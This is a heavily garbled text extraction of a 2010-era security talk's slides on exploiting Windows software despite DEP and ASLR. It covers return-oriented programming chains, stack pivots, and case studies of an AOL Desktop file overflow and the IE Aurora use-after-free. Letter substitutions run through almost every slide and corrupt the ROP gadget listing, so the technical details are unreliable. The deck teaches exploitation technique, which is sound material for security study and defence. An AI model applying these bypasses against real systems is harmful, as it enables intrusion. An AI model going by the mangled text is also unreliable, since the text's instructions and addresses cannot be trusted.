Hostel Exploitation

8/9/2019 Hostel Exploitation

1/35

Steven SeeleyAssociate consultant at stratsec

stile Expl itati n under

2in

Leveling the playing field


2/35

Overview●

Disclaimer(s)● What is DEP?

● What is ASLR?

● DEP bypass techniques

ROP ! Return Oriente" Pr#$rammin$

● ASLR bypass techniques

● %ase stu"y! AOL Des&t#p ES' t# stac& piv#t c#ntr#l

●

%ase stu"y! 'E Aur#ra Ob*ect p#inter t# stac& piv#tc#ntr#l

● %#nclusi#ns

● Re+erences

● ,uesti#ns


3/35

Disclaimer(s)

● -y ap#l#$ies in a"vance i+ ' miss thin$s. '#nly have up t# /0 minutes1

● ' "i"n2t invent this stu++3

● S#rry ' "i"n2t use vuln1c. ' try t# &eep itthin$s practical1

● DEP bypasses are n#t new3 't was bein$

"#ne even be+#re -S #++icially intr#"uce"DEP1


4/35

What is DEP?●

45 6 5D 4# e5ecute7e5ecute Disable"● 8irst hit the -S scene in Win"#ws 5P SP/

● We are at win7/009 server n#w an" m#st pe#plestill OptOut #+ DEP +#r a l#t #+ c#mm#n thir" party

applicati#ns1

:w# types. s#+tware an" har"ware en+#rce"

A +#cus #n har"ware enable" DEP

● :he 45 +la$ is set in the %P; (win"#ws runs inPAE m#"e by "e+ault n#w)

● :he parent pr#cess enables DEP by usin$ a win


5/35

What is DEP?●

-ar&s "ata areas #+ mem#ry t# be n#t e=ecutable such thestac& an" heap

● '+ an attempt is ma"e t# e=ecute c#"e. AS:A:;S>A%%ESS>'OLA:'O4 0=c000000@ will #ccur

●

ways t# set DEP p#licy un"er win


6/35

What is ASLR?●

A""ress Space Lay#ut Ran"#miCati#n● Reb##tin$ the OS lea"s t# ran"#miCin$ the

l#wer #+ the tw# m#st si$ni+icant bytes in a


7/35

What is ASLR?

● 9 bits #+ entr#py with /@ p#ssible values● When runnin$ tests. appr#=imately. #nly


8/35

Wa&e up3 :his is where it

$ets +un3


9/35

DEP bypass techniques

● ;sin$ Return #riente" pr#$rammin$. we canreturn int# Win"#ws AP'1

● irtualAll#c()

●

Feap%reate(FEAP>%REA:E>E4AGLE>E5E%;:AGLE)● SetPr#cessDEPP#licy()

● 4tSet'n+#rmati#nPr#cess()

● irtualPr#tect() up"ate mem#ry as e=ecutable

● WritePr#cess-em#ry() c#py payl#a" int# e=ecutablemem#ry1 :echnique! patch &ernel


10/35


11/35


3+in"anti"ep shippe" with 'mmunity vB10● Set AL t# B. let nt"ll setup #ur stac& an" call

IWSet'n+#rmati#nPr#cess() an" then return t# a ptr (e$! *mpesp) that +inally parses c#ntr#l t# #ur shellc#"e

●

Per+ect. a $eneric way t# bypass DEP with#ut the 7permanent+la$ set3

● but "#esn2t "e+eat en+#rce" har"ware DEP !(


12/35


4ew(er) sch##l techniques t# bypass har"ware en+#rce"DEP with 7n#e=ecuteJAlwaysOn

● We can use special heap sprays (':. AA)

ROP Return Oriente" Pr#$rammin$

● Return t# #ne #+ many win"#ws AP'

● ROP requires "ynamic $enerati#n #+ ARK values

● %han$es7all#cates7creates new mem#ry as e=ecutable

As Saumil Shah sai". ESP is the new E'P1 '+ y#u piv#tc#ntr#l #+ ESP. then y#u will win1


13/35


S# whats the pr#blem?

● ASLR. We "#n2t &n#w where the ROP $a"$ets arest#re" at3

● Reliability "i++erent m#"ule versi#ns have"i++erent c#"e1

● Reliability pr#$ram state is imp#rtant1 Openin$ a+ile "ial#$ l#a"s a l#t m#re libraries1

● Payl#a" space any#ne?

● E: ulnerability t# E=pl#it :ime is l#n$er. mi$htta&e a +ew "ays instea" #+ a +ew h#urs1


14/35


“Preventing the introduction of malicious code is notenough to prevent the execution of maliciouscomputations” - Dino A. Dai Zovi

● Return chainin$ via $a"$etsM. a sin$le $a"$et will e=ecute achain #+ instructi#ns that will setup an ar$ument value1

● ;ses b#rr#we" sequences #+ instructi#ns that RE:4M bac& t#the stac&1

● ulnerabilities with heavy character restricti#ns will pr#vi"e +#r avery "i++icult e=pl#itati#n e=perience1

● 's simple in un"erstan"in$ an" #nly bec#mes "i++icult i+ #thermiti$ati#n2s are inv#lve"1

● E=ample $a"$et?


15/35


POP EAXRETN

ADD EAX,20RETN

ADD EAX,20RETN

MOV DORD PTR DS!"EAX#$%, EDX

RETN

X&'( EDX,EAX

ADD EDX, )RETN

POP 0*++++++++ into EAX

EAX is 0*000000)+

EAX is 0*000000+

EDX is 0*)00)/+EAX is 0*000000+

EAX is eco1es 0*)00)/+EDX is eco1es 0*000000$0

ite into 1e1oy!Re+eence EAX#$ to 3oint to attac4e

contolle5 value 60*000000$07

:he secret t# ROPis t# &eep itsimple3


16/35


-any instructi#ns can be use" t# piv#t c#ntr#l bac& t# thestac&1

Structure" E=cepti#n han"ler base"!

● ADD ESP. 555N RE:4

● POP R


17/35

ASLR bypass techniques●

Grute+#rce the base a""ress i+ the parent pr#cess createschil" pr#cesses1 E=ample! PFP Dev 10 str>transliterate()Gu++er #ver+l#w e=pl#it1

● Lea& a p#inter +r#m the stac&. rebase it. calculate #++set1E=ample! GlaCe DD 1pl+ +ile bu++er #ver+l#w e=pl#it1 (:his is

"epen"ent #n applicati#n state)● -em#ry a""ress "iscl#sure (mem#ry lea&)

-aybe p#inter in+erences such as Acti#n Script "icti#narylea&1

● ': spray with interprete" =#r instructi#ns (patche" an""ea" +#r n#w)1

● One #r tw# byte #verwrite

● 14E: user c#ntr#l l#a"in$ usin$ #b*ect (bl#c&e" +r#m

internet C#ne n#w)


18/35

ASLR bypass techniques●

Remember. even i+ y#ur applicati#n #nly has #ne m#"ulethat is n#t ASLR c#mpliment. then y#u "#n2t really haveASLR1

● L#a"


19/35

%ase stu"y! AOL Des&t#pAOL Des&t#p 1rt= +ile #ver+l#w

Alm#st typical stac& #ver+l#w. nice an" easy with +ull E'P c#ntr#l


20/35


L#a" EA5 with a p#inter t# #ur shellc#"e

%#ntr#lle" mem#ry


21/35


Swap ES' +#r ESP. ta&in$ +ull c#ntr#l #+ the stac&

ali" mem#ry written at EA5 s# that we "#n2t +ail here

Kiven this. can any#ne

tell me where we arereturnin$ t## in mem#ry?


22/35


ust t# clari+y. this is h#wthe stac& may l##& li&e.p#inters everywhere1

4#te! :he har"c#"e"irtualPr#tect() call. i+ we were t# bypass ASLR. this

w#ul" have t# be $enerate""ynamically


23/35


Ar$uments in re$isters. rea"y +#rthe +inal pusha"N retn

:he ar$uments t# virtualPr#tect()all setup #n the stac&1

A+ter the call t# virtualpr#tect(). we will be returnin$ this a""resshere (n#p sle")


24/35


Pr#+it


25/35


26/35


27/35

%ase stu"y! 'E Aur#ra 'nternet E=pl#rer use a+ter +ree mem#ry c#rrupti#n (%E/0B00/H)

An o8ect 9:ic: i13le1ents 3oly1o3:is1 6suc: as ou +ee o8ect7 9illcontain a vitual +unction tale 6vtale7 3ointe as t:e +ist 1e1e o+t:e o8ect. e nee5 to c:an;e t:is a55ess to 3oint to a ne9 talecontainin; t:e a55ess o+ ou o3 stu at tale o++set 0*$<

Gase a""ress

#+ the p#inter we are $#in$ t#use

We w#ul" setEA5 t#

BBBB. which w#ul" later bechan$e" t# ap#inter t# theROP stub e$!0=0


28/35


What we w#ul" "# is set the value t# a reliable &n#wn #++set (0=0Bb)a+ter a "ecent spray has #ccure"1 S# simply. we will set EA5 t# the samevalue as E%5 s# that a call EA5


29/35


Lets spray a ROP stub an" call a piv#t t# $ain c#ntr#l #+ ESP1

Our ROP stub.rea"y t#e=ecute +r#m

the stac&

8inal call !)


30/35


Pr#+it


31/35

%#nclusi#n! Are we sa+e?

● DEP an" ASLR t#$ether are a p#wer+ul mi=. #nec#mpliments the #ther1

● #u will see less an" less public practicale=pl#itati#n a$ainst win7server /009 as b#thmechanisms are #n by "e+ault1

● :he 0"ay techniques t# bypass these miti$ati#n2sare w#rth m#re than 0"ays themselves1 :hese willbe &ept private +#r sure1


32/35

%#nclusi#ns! Are we sa+e?

● G#th the miti$ati#n2s are #n by "e+ault an"will st#p a fair amount of e=pl#itati#n. butn#t all1

●

Speci+ic analysis #n in"ivi"ualplat+#rms7applicati#ns will nee" t# bec#n"ucte" t# "etermine the e=pl#itabilityan" impact1

● :his pr#cess will bec#me e=pensive. s#clients will miss #ut?

● Oh b#y an" ' haven2t even tal&e" ab#ut

Pr#tecte" m#"e #r E-E:1


33/35

:han&s 3

tecr0c. wire$h#ul. c#relanc0"


34/35


35/35

,uesti#ns ?

Documents

Hostel Exploitation